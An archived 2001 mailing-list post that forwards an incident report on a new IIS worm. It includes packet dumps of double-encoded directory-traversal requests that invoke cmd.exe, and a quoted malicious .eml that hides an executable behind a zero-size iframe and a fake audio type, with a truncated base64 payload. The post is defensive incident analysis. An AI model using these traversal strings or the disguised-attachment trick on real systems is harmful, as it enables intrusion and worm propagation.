[iwar] [fc:More.details.on.the.new.worm]

From: Fred Cohen (fc@all.net)
Date: 2001-09-18 09:17:26


Return-Path: <sentto-279987-2034-1000829843-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 18 Sep 2001 09:18:16 -0700 (PDT)
Received: (qmail 9661 invoked by uid 510); 18 Sep 2001 16:17:54 -0000
Received: from n6.groups.yahoo.com (216.115.96.56) by 204.181.12.215 with SMTP; 18 Sep 2001 16:17:54 -0000
X-eGroups-Return: sentto-279987-2034-1000829843-fc=all.net@returns.onelist.com
Received: from [10.1.1.220] by hm.egroups.com with NNFMP; 18 Sep 2001 16:17:28 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_3_2_2); 18 Sep 2001 16:17:23 -0000
Received: (qmail 96616 invoked from network); 18 Sep 2001 16:17:23 -0000
Received: from unknown (10.1.10.142) by 10.1.1.220 with QMQP; 18 Sep 2001 16:17:23 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta3 with SMTP; 18 Sep 2001 16:17:27 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id JAA05601 for iwar@onelist.com; Tue, 18 Sep 2001 09:17:26 -0700
Message-Id: <200109181617.JAA05601@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Tue, 18 Sep 2001 09:17:26 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:More.details.on.the.new.worm]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

[FC - from incidents@securityfocus.com]

It uses double-encoding exploits, and propagates both by adding 
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date    Time  D Source IP       Sport Dport   P
01Sep18 11:20 T 200.192.226.40   3933    80   T
01Sep18 11:20 T 200.192.226.40   3767    80   T
01Sep18 11:20 T 200.192.226.40   3572    80   T

  SOURCE: 200.192.226.40

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx 
E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00 
...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET 
/_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e 
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx 
E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00 
...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET 
/_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e 
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx 
E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00 
.].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET 
/msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e 
/..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e 
.%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 
/..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 
stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r 
HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 
w..Connnection: clos
  65 0d 0a 0d 0a                                              e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I 
saw the normal web page for the institution, plus a pop-up window for 
<a href="http://femm.tdkomm.com.br/readme.DONT.eml">http://femm.tdkomm.com.br/readme.DONT.eml> (without "DONT"), as 
follows:


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


&lt;HTML&lt;HEAD&lt;/HEAD&lt;BODY bgColor=3D#ffffff
&lt;iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0
&lt;/iframe&lt;/BODY&lt;/HTML
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: &lt;EA4DMGBP9p

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 



This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT